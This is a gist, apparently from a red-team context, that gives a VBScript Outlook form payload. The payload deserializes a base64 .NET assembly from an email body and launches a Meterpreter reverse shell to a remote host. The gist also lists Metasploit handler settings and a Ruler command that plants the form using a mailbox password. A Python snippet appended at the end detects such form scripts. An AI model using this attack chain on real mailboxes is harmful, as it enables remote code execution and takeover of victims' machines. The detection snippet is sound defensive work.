@leoloobeek
Forked from staaldraad/Command.vbs
Created November 6, 2017 23:14
Using VBSMeter with Ruler
Call X()
End Function
Dim RHOST: RHOST = "x.x.x.x"
Dim RPORT: RPORT = "8999"
Function Base64ToStream(b)
    Dim enc, length, ba, transform, ms
    Set enc = CreateObject("System.Text.ASCIIEncoding")
    length = enc.GetByteCount_2(b)
    Set transform = CreateObject("System.Security.Cryptography.FromBase64Transform")
    Set ms = CreateObject("System.IO.MemoryStream")
    ms.Write transform.TransformFinalBlock(enc.GetBytes_4(b), 0, length), 0, ((length / 4) * 3)
    ms.Position = 0
    Set Base64ToStream = ms
End Function
Sub Pew
    Dim s, entry_class
    s = Trim(Item.Body)
    entry_class = "MeterPreter"
    Dim fmt, al, d, o
    Set fmt = CreateObject("System.Runtime.Serialization.Formatters.Binary.BinaryFormatter")
    Set al = CreateObject("System.Collections.ArrayList")
    al.Add fmt.SurrogateSelector
    Set d = fmt.Deserialize_2(Base64ToStream(s))
    Set o = d.DynamicInvoke(al.ToArray()).CreateInstance(entry_class)
    o.MSFConnect RHOST, RPORT
End Sub
Function X()
    Pew


This requires Ruler

The original payload, VBSMeter, was created by @Cn33liz and can be found here: VBSMeter. The version here is slightly slimmed down and modified so that it fits within the maximum payload size for Ruler forms.

The "payload" has been split into a separate file. This allows us to send it as the message body of an email and have the form invoke it dynamically.

Setup MSF

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp 
set LHOST 0.0.0.0
set LPORT 443
set AutoRunScript post/windows/manage/migrate NAME=notepad.exe
set EnableUnicodeEncoding true
set EnableStageEncoding true
set ExitOnSession false
set EXITFUNC thread
exploit -j

Remember to set EXITFUNC; if you leave it as process, Outlook will crash/exit.

Shell through Ruler

  1. Create Command.vbs and Payload.b64.
  2. cat /tmp/Payload.b64|xargs -0 -I{} ./ruler-linux64 --email [email protected] --password "ThePassword" form add --suffix metpew --input /tmp/Command.vbs --send --body "{}" --rule
  3. You should receive a shell

You'll note that Command.vbs has a bit of a weird syntax.

Call X()
End Function

^ this closes the Function P(), which exists in the default forms template.

Function X()
Pew

^ this calls our sub to spawn the shell. There is NO End Function needed as the default forms template inserts this automatically.
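For reviewing form scripts from the defensive side, the fragment shape described above (a close for a function it never opened, plus a function left open at the end) and the .NET ProgIDs used in Command.vbs are both checkable signals. The following is an added example, not part of the original gist or of Ruler; it assumes the script text has already been obtained as a string, and `block_balance` and `review` are hypothetical helper names.

```python
import re

# Strings taken from the Command.vbs listing on this page; VBScript is
# case-insensitive, so they are matched that way.
INDICATORS = {
    "binaryformatter": r"System\.Runtime\.Serialization\.Formatters\.Binary\.BinaryFormatter",
    "base64_transform": r"System\.Security\.Cryptography\.FromBase64Transform",
    "deserialize_call": r"\.Deserialize(_2)?\b",
    "dynamic_invoke": r"\.DynamicInvoke\b",
    "reads_item_body": r"\bItem\.Body\b",
}
OPEN = re.compile(r"^\s*(?:(?:public|private)\s+)?(?:function|sub)\b", re.I)
CLOSE = re.compile(r"^\s*end\s+(?:function|sub)\b", re.I)

def block_balance(script):
    """Return (orphan_closes, unclosed_opens) for Function/Sub blocks."""
    orphan, depth = 0, 0
    for line in script.splitlines():
        # Blank out string literals, then cut the line at a ' comment marker.
        code = re.sub(r'"[^"]*"', '""', line).split("'", 1)[0]
        if OPEN.match(code):
            depth += 1
        elif CLOSE.match(code):
            if depth:
                depth -= 1
            else:
                orphan += 1
    return orphan, depth

def review(script):
    """Score one form script (hypothetical helper, not a Ruler or Outlook API)."""
    hits = sorted(n for n, rx in INDICATORS.items() if re.search(rx, script, re.I))
    orphan, unclosed = block_balance(script)
    escape = orphan > 0 and unclosed > 0
    return {"indicators": hits, "template_escape": escape,
            "suspicious": escape or len(hits) >= 2}

# Constructed samples: an abbreviated fragment in the shape of Command.vbs,
# and an ordinary, balanced form script.
SAMPLE_FRAGMENT = '''Call X()
End Function
Sub Pew
Set fmt = CreateObject("System.Runtime.Serialization.Formatters.Binary.BinaryFormatter")
Set d = fmt.Deserialize_2(Base64ToStream(Trim(Item.Body)))
End Sub
Function X()
Pew
'''
SAMPLE_BENIGN = '''Function Item_Open()
MsgBox "Expense form v2"   ' don't edit
End Function
'''

if __name__ == "__main__":
    print(review(SAMPLE_FRAGMENT))
```

The balance check only fires on the supplied fragment; once the forms template has wrapped it the script is balanced again, so on a deployed form the indicator strings are the signal that remains.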
